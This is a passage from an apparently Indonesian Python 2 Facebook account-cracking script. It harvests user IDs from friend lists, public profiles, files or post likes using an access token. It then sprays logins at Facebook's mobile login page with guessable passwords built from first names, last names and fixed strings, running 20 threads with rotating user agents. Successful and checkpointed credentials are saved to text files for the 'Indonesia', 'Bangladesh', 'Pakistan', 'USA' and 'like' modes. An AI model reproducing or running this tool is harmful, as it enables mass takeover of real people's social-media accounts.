rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pw4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pw4
oke = open('done/indo.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pw4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;96m[Cekpoint]\033[0;97m '+em+' \033[0;96m∆\033[0;97m '+pw4
cek = open('done/indo.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pw4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;96mSelesai ...'
print"\033[0;91m• \033[0;96mTotal \033[0;92mOK\033[0;97m/\x1b[0;96mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;96m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;96mCP \033[0;96mfile tersimpan \033[0;91m: \033[0;92mdone/indo.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;96mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CRACK BANGLADESH ####
def crack_bangla():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;94m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;94m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
print ('\033[0;94m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_bangla()
### PILIH BANGLADESH ###
def pilih_bangla():
teak = raw_input('\033[0;94m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_bangla()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;94mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;94m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;94mKembali \033[0;97m>")
crack_bangla()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;94mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;94m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;94mKembali \033[0;97m>")
crack_bangla()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_bangla()
print '\033[0;91m• \033[0;94mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;94mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;94mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;94mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN BANGLADESH ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pz = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz)
cek.close()
cekpoint.append(em)
else:
pz2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz2
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz2
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz2)
cek.close()
cekpoint.append(em)
else:
pz3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz3
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz3
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz3)
cek.close()
cekpoint.append(em)
else:
pz4 = '786786'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pz4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pz4
oke = open('done/bangla.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pz4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;94m[Cekpoint]\033[0;97m '+em+' \033[0;94m∆\033[0;97m '+pz4
cek = open('done/bangla.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pz4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;94mSelesai ...'
print"\033[0;91m• \033[0;94mTotal \033[0;92mOK\033[0;97m/\x1b[0;94mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;94m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;94mCP \033[0;94mfile tersimpan \033[0;91m: \033[0;92mdone/bangla.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;94mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CRACK PAKISTAN ####
def crack_pakis():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;90m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;90m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
print ('\033[0;90m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_pakis()
### PILIH PAKISTAN ###
def pilih_pakis():
teak = raw_input('\033[0;90m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_pakis()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;90mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;90m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;90mKembali \033[0;97m>")
crack_pakis()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;90mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;90m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;90mKembali \033[0;97m>")
crack_pakis()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_pakis()
print '\033[0;91m• \033[0;90mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;90mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;90mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;90mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN PAKISTAN ###
def main(art):
global cekpoint,oks
ef = art
try:
os.mkdir('done')
except OSError:
pass
try:
ah = requests.get('https://graph.facebook.com/'+ef+'/?access_token='+toket)
p = json.loads(ah.text)
pb = 'Pakistan'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb)
oke.close()
oks.append(ef)
else :
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb)
cek.close()
cekpoint.append(ef)
else:
pb2 = '786786'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb2
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb2)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb2
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb2)
cek.close()
cekpoint.append(ef)
else:
pb3 = p['first_name']+'1234'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb3
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb3)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb3
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb3)
cek.close()
cekpoint.append(ef)
else:
pb4 = p['first_name']+'12345'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb4
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb4)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb4
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb4)
cek.close()
cekpoint.append(ef)
else:
pb5 = p['first_name']+'123'
rep = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : ef, "pass" : pb5, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xs = rep.content
if 'mbasic_logout_button' in xs or 'save-device' in xs:
print '\033[0;92m[Berhasil]\033[0;97m '+ef+' \033[0;92m∆ \033[0;97m'+pb5
oke = open('done/pakis.txt', 'a')
oke.write('\n[Berhasil] '+ef+' ∆ '+pb5)
oke.close()
oks.append(ef)
else:
if 'checkpoint' in xs:
print '\033[0;90m[Cekpoint]\033[0;97m '+ef+' \033[0;90m∆\033[0;97m '+pb5
cek = open('done/pakis.txt', 'a')
cek.write('\n[Cekpoint] '+ef+' ∆ '+pb5)
cek.close()
cekpoint.append(ef)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;90mSelesai ...'
print"\033[0;91m• \033[0;90mTotal \033[0;92mOK\033[0;97m/\x1b[0;90mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;90m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;90mCP \033[0;90mfile tersimpan \033[0;91m: \033[0;92mdone/pakis.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;90mKembali\033[0;97m >")
os.system("python2 crack-2.py")
#### CRACK USA ####
def crack_usa():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print ('\033[0;95m1.\033[0;97m Crack Dari Daftar Teman');time.sleep(0.07)
print ('\033[0;95m2.\033[0;97m Crack Dari Publik/Teman');time.sleep(0.07)
print ('\033[0;95m3.\033[0;97m Crack Dari File');time.sleep(0.07)
print ('\033[0;91m0.\033[0;97m Kembali');time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
pilih_usa()
### PILIH USA ###
def pilih_usa():
teak = raw_input('\033[0;95m>\033[0;97m ')
if teak =="":
print '\033[0;91m! Isi Yg Benar'
pilih_usa()
elif teak =="1":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2":
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;95mID Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print "\033[0;91m•\033[0;95m Nama \033[0;91m:\033[0;92m "+sp["name"]
except KeyError:
print "\033[0;91m! ID publik/teman tidak ada"
raw_input("\n\033[1;97m< \033[0;95mKembali \033[0;97m>")
crack_usa()
except requests.exceptions.ConnectionError:
print '\033[0;91m! Tidak ada koneksi'
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idlist = raw_input('\033[0;91m• \033[0;95mNama File\033[0;91m :\033[0;92m ');time.sleep(0.07)
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[0;91mFile tidak ada ! '
raw_input('\033[0;97m<\033[0;95m Kembali\033[0;97m >')
except IOError:
print '\033[0;91mFile tidak ada !'
raw_input("\n\033[0;97m< \033[0;95mKembali \033[0;97m>")
crack_usa()
elif teak =="0" or teak =="00":
crack_teman()
else:
print '\033[0;91m! Isi Yg Benar'
pilih_usa()
print '\033[0;91m• \033[0;95mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;95mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;95mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;95mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN USA ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
px = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px)
cek.close()
cekpoint.append(em)
else:
px2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px2
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px2
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px2)
cek.close()
cekpoint.append(em)
else:
px3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px3
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px3
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px3)
cek.close()
cekpoint.append(em)
else:
px4 = '123456'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : px4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+px4
oke = open('done/usa.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+px4)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;95m[Cekpoint]\033[0;97m '+em+' \033[0;95m∆\033[0;97m '+px4
cek = open('done/usa.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+px4)
cek.close()
cekpoint.append(em)
except:
pass
p = ThreadPool(20)
p.map(main, id)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
print '\033[0;91m• \033[0;95mSelesai ...'
print"\033[0;91m• \033[0;95mTotal \033[0;92mOK\033[0;97m/\x1b[0;95mCP \033[0;97m: \033[0;92m"+str(len(oks))+"\033[0;97m/\033[0;95m"+str(len(cekpoint))
print '\033[0;91m• \033[0;92mOK\033[0;97m/\x1b[0;95mCP \033[0;95mfile tersimpan \033[0;91m: \033[0;92mdone/usa.txt'
print 50* "\033[0;93m─"
raw_input("\033[0;97m< \033[0;95mKembali\033[0;97m >")
os.system("python2 crack-2.py")
### CRACK LIKE ###
def crack_like():
global toket
try:
toket=open('login.txt','r').read()
except IOError:
print '\033[0;91m! Token Invalid'
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
idt = raw_input("\033[0;91m• \033[0;91mID Postingan Publik/Teman \033[0;91m:\033[0;92m ");time.sleep(0.07)
try:
r = requests.get("https://graph.facebook.com/"+idt+"/likes?limit=9999999&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
except KeyError:
print "\033[0;91m! ID postingan salah"
raw_input("\n\033[1;97m< \033[0;91mKembali \033[0;97m>")
menu()
except requests.exceptions.SSLError:
print '! Koneksi Tidak Ada'
exit()
print '\033[0;91m• \033[0;91mJumlah ID\033[0;91m :\033[0;92m '+str(len(id));time.sleep(0.07)
print ('\033[0;91m• \033[0;91mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[0;91m• \033[0;91mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print ("\n\033[0;91m• \033[0;91mTidak Ada Hasil ? Gunakan Mode Pesawat 1 Detik !");time.sleep(0.07)
print ("\033[0;93m──────────────────────────────────────────────────────");time.sleep(0.07)
### MAIN LIKE ###
def main(arg):
global cekpoint,oks
em = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+em+'/?access_token='+toket)
v = json.loads(an.text)
pc = v['first_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc, "login" : "submit"}, headers = { "user-agent" : "Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc)
oke.close()
oks.append(em)
else :
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc)
cek.close()
cekpoint.append(em)
else:
pc2 = v['first_name']+'12345'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc2, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.1.2; AFTMM Build/NS6265; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.110 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc2
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc2)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc2
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc2)
cek.close()
cekpoint.append(em)
else:
pc3 = v['first_name']+'1234'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc3, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 6.0.1; SM-G532G Build/MMB29T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.83 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
print '\033[0;92m[Berhasil]\033[0;97m '+em+' \033[0;92m∆ \033[0;97m'+pc3
oke = open('done/like.txt', 'a')
oke.write('\n[Berhasil] '+em+' ∆ '+pc3)
oke.close()
oks.append(em)
else:
if 'checkpoint' in xo:
print '\033[0;91m[Cekpoint]\033[0;97m '+em+' \033[0;91m∆\033[0;97m '+pc3
cek = open('done/like.txt', 'a')
cek.write('\n[Cekpoint] '+em+' ∆ '+pc3)
cek.close()
cekpoint.append(em)
else:
pc4 = v['last_name']+'123'
rex = requests.post("https://mbasic.facebook.com/login.php", data = {"email" : em, "pass" : pc4, "login" : "submit"}, headers = {"user-agent" : "Mozilla/5.0 (Linux; Android 7.0; SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36"})
xo = rex.content
if 'mbasic_logout_button' in xo or 'save-device' in xo:
